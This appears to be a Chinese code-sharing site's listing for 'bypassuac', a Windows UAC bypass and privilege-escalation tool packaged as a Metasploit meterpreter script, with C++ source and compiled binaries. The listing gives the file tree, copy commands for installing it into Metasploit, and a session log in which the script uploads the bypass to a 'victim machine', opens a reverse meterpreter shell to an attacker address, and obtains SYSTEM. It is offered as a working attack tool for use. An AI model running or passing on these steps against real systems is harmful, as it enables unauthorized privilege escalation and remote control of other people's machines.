bypassuac
所属分类:其他
开发工具:VBScript
文件大小:933KB
下载次数:0
上传日期:2018-09-17 20:07:28
上 传 者:
Edwardushka22
说明: Bypass Windows UAC and escalate privilegies!
文件列表:
bypassuac (0, 2010-12-31)
bypassuac\.DS_Store (12292, 2010-12-31)
__MACOSX (0, 2010-12-31)
__MACOSX\bypassuac (0, 2010-12-31)
__MACOSX\bypassuac\._.DS_Store (82, 2010-12-31)
bypassuac\bypassuac.rb (4341, 2010-12-31)
bypassuac\source code (0, 2010-12-31)
bypassuac\source code\.DS_Store (12292, 2010-12-31)
__MACOSX\bypassuac\source code (0, 2010-12-31)
__MACOSX\bypassuac\source code\._.DS_Store (82, 2010-12-31)
bypassuac\source code\CMMN.cpp (5987, 2010-11-18)
bypassuac\source code\CMMN.h (3179, 2010-12-31)
bypassuac\source code\Redirector.cpp (2325, 2010-11-19)
bypassuac\source code\Redirector.h (878, 2010-12-31)
bypassuac\source code\stdafx.h (440, 2010-11-16)
bypassuac\source code\targetver.h (314, 2010-11-16)
bypassuac\source code\TIOR (0, 2010-12-31)
bypassuac\source code\TIOR\stdafx.cpp (291, 2010-11-16)
bypassuac\source code\TIOR\stdafx.h (341, 2010-11-16)
bypassuac\source code\TIOR\targetver.h (314, 2010-11-16)
bypassuac\source code\TIOR\TIOR.cpp (4430, 2010-12-31)
bypassuac\source code\TIOR\TIOR.vcxproj (8482, 2010-11-16)
bypassuac\source code\TIOR\TIOR.vcxproj.filters (1456, 2010-11-16)
bypassuac\source code\TIOR\TIOR.vcxproj.user (143, 2010-11-16)
bypassuac\source code\Win32 (0, 2010-12-31)
bypassuac\source code\Win32\.DS_Store (6148, 2010-12-31)
__MACOSX\bypassuac\source code\Win32 (0, 2010-12-31)
__MACOSX\bypassuac\source code\Win32\._.DS_Store (82, 2010-12-31)
bypassuac\source code\Win32\Release (0, 2010-11-19)
bypassuac\source code\Win32\Release\TIOR32.exe (125440, 2010-11-19)
bypassuac\source code\Win32\Release\Win7Elevate32.exe (421376, 2010-11-19)
bypassuac\source code\Win32\Release\Win7ElevateDll32.dll (76800, 2010-11-19)
bypassuac\source code\Win7Elevate (0, 2010-12-31)
bypassuac\source code\Win7Elevate\Resource.h (542, 2010-11-16)
bypassuac\source code\Win7Elevate\stdafx.cpp (298, 2010-11-16)
bypassuac\source code\Win7Elevate\stdafx.h (1062, 2009-04-20)
bypassuac\source code\Win7Elevate\targetver.h (314, 2010-11-16)
bypassuac\source code\Win7Elevate\Win7Elevate.cpp (20194, 2010-11-19)
bypassuac\source code\Win7Elevate\Win7Elevate.rc (2215, 2010-11-16)
... ...
SIMPLE: copy the uac folder to your root msf directory and data/exploits/ so cp -rf uac/ /pentest/exploits/framework3/data/exploits/
next: copy bypassuac.rb /pentest/exploits/framework3/scripts/meterpreter
From meterpreter> shell, run bypassuac.
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter > run bypassuac
[*] Creating a reverse meterpreter stager: LHOST=172.16.32.128 LPORT=4546
[*] Running payload handler
[*] Uploading Windows UACBypass to victim machine.
[*] Bypassing UAC Restrictions on the system....
[*] Meterpreter stager executable 73802 bytes long
[*] Uploaded the agent to the filesystem....
[*] Executing the agent with endpoint 172.16.32.128:4546 with UACBypass in effect...
[*] C:\Users\dave-dev\AppData\Local\Temp\ULPLcpvueZu.exe /c %TEMP%\GCnkvZyVxv.exe
meterpreter > [*] Meterpreter session 2 opened (172.16.32.128:4546 -> 172.16.32.130:1594) at Fri Dec 31 21:45:47 -0500 2010
meterpreter >
Background session 1? [y/N] y
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > getsystem
...got system (via technique 1).
近期下载者:
相关文件:
收藏者: